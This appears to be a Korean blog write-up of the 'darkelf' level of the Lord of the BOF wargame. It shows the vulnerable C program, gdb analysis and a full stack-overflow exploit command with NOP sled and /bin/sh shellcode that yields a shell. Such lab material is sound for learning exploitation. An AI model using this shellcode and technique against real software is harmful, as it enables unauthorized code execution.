wolfman / love eyuna로 접속
darkelf.c
/*
The Lord of the BOF : The Fellowship of the BOF
- darkelf
- egghunter + buffer hunter + check length of argv[1]
*/
#include <stdio.h>
#include <stdlib.h>
extern char **environ;
main(int argc, char *argv[])
{
char buffer[40];
int i;
if(argc < 2){
printf("argv error\n");
exit(0);
}
// egghunter
for(i=0; environ[i]; i++)
memset(environ[i], 0, strlen(environ[i]));
if(argv[1][47] != '\xbf')
{
printf("stack is still your friend.\n");
exit(0);
}
// check the length of argument
if(strlen(argv[1]) > 48){
printf("argument is too long!\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
// buffer hunter
memset(buffer, 0, 40);
}
이번에도 저번과 같은 조건에 추가로 argv[1] 길이에 제한이 있고, 버퍼를 초기화한다.
RET 영역 뒤에 쉘코드를 삽입할 수 없고, 환경변수도 사용할 수 없으므로 argv[2]를 사용해야 할 것 같다. argv[2]의 주소를 찾아 nop와 쉘코드를 넣어줄 것이다.
[wolfman@localhost wolfman]$ gdb -q darkelf2
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
0x8048500 <main>: push %ebp
0x8048501 <main+1>: mov %ebp,%esp
0x8048503 <main+3>: sub %esp,44
0x8048506 <main+6>: cmp DWORD PTR [%ebp+8],1
0x804850a <main+10>: jg 0x8048523 <main+35>
0x804850c <main+12>: push 0x8048670
0x8048511 <main+17>: call 0x8048410 <printf>
0x8048516 <main+22>: add %esp,4
0x8048519 <main+25>: push 0
0x804851b <main+27>: call 0x8048420 <exit>
0x8048520 <main+32>: add %esp,4
0x8048523 <main+35>: nop
0x8048524 <main+36>: mov DWORD PTR [%ebp-44],0x0
...
0x80485e3 <main+227>: add %eax,4
0x80485e6 <main+230>: mov %edx,DWORD PTR [%eax]
0x80485e8 <main+232>: push %edx
0x80485e9 <main+233>: lea %eax,[%ebp-40]
0x80485ec <main+236>: push %eax
0x80485ed <main+237>: call 0x8048440 <strcpy>
0x80485f2 <main+242>: add %esp,8
0x80485f5 <main+245>: lea %eax,[%ebp-40]
0x80485f8 <main+248>: push %eax
0x80485f9 <main+249>: push 0x80486b0
0x80485fe <main+254>: call 0x8048410 <printf>
0x8048603 <main+259>: add %esp,8
0x8048606 <main+262>: push 40
---Type <return> to continue, or q <return> to quit---
0x8048608 <main+264>: push 0
0x804860a <main+266>: lea %eax,[%ebp-40]
0x804860d <main+269>: push %eax
0x804860e <main+270>: call 0x8048430 <memset>
0x8048613 <main+275>: add %esp,12
0x8048616 <main+278>: leave
0x8048617 <main+279>: ret
0x8048618 <main+280>: nop
0x8048619 <main+281>: nop
0x804861a <main+282>: nop
0x804861b <main+283>: nop
0x804861c <main+284>: nop
0x804861d <main+285>: nop
0x804861e <main+286>: nop
0x804861f <main+287>: nop
End of assembler dump.
strcpy 함수 호출 뒤에 bp를 걸어주었다.
(gdb) b *main+242
Breakpoint 1 at 0x80485f2
(gdb) r `python -c 'print "\xbf"*48'` `python -c 'print "B"*100'`
Starting program: /home/wolfman/darkelf2 `python -c 'print "\xbf"*48'` `python -c 'print "B"*100'`
Breakpoint 1, 0x80485f2 in main ()
argv[2]에 B를 넣어주었다.
(gdb) x/100x $esp
...
0xbffffb94: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffba4: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbb4: 0x00000000 0x00000000 0x36383669 0x6f682f00
0xbffffbc4: 0x772f656d 0x6d666c6f 0x642f6e61 0x656b7261
(gdb)
0xbffffbd4: 0x0032666c 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf
0xbffffbe4: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf
0xbffffbf4: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf
0xbffffc04: 0xbfbfbfbf 0x42424200 0x42424242 0x42424242
0xbffffc14: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffffc24: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffffc34: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffffc44: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffffc54: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffffc64: 0x42424242 0x42424242 0x00000042 0x00000000
0xbffffc74: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc84: 0x00000000 0x00000000 0x00000000 0x00000000
...
0x42424242가 들어간 부분의 주소 하나를 입력해주면 될 것 같다. 0xbffffc44로 정했다.
dummy(44) + argv[2]주소(4) + nop(1000) + shellcode(25)
./darkelf `python -c 'print "A"*44+"\x44\xfc\xff\xbf"'` `python -c 'print "\x90"*1000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
[wolfman@localhost wolfman]$ ./darkelf `python -c 'print "A"*44+"\x44\xfc\xff\xbf"'` `python -c 'print "\x90"*1000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD??
bash$ my-pass
euid = 506
kernel crashed
공격에 성공했다!
kernal crashed
'시스템 해킹 > LOB' 카테고리의 다른 글
| [LOB] orge → troll (0) | 2021.02.24 |
|---|---|
| [LOB] darkelf → orge (0) | 2021.02.22 |
| [LOB] orc → wolfman (0) | 2021.02.21 |
| [LOB] goblin → orc (0) | 2021.02.21 |
| [LOB] cobolt → goblin (0) | 2021.02.20 |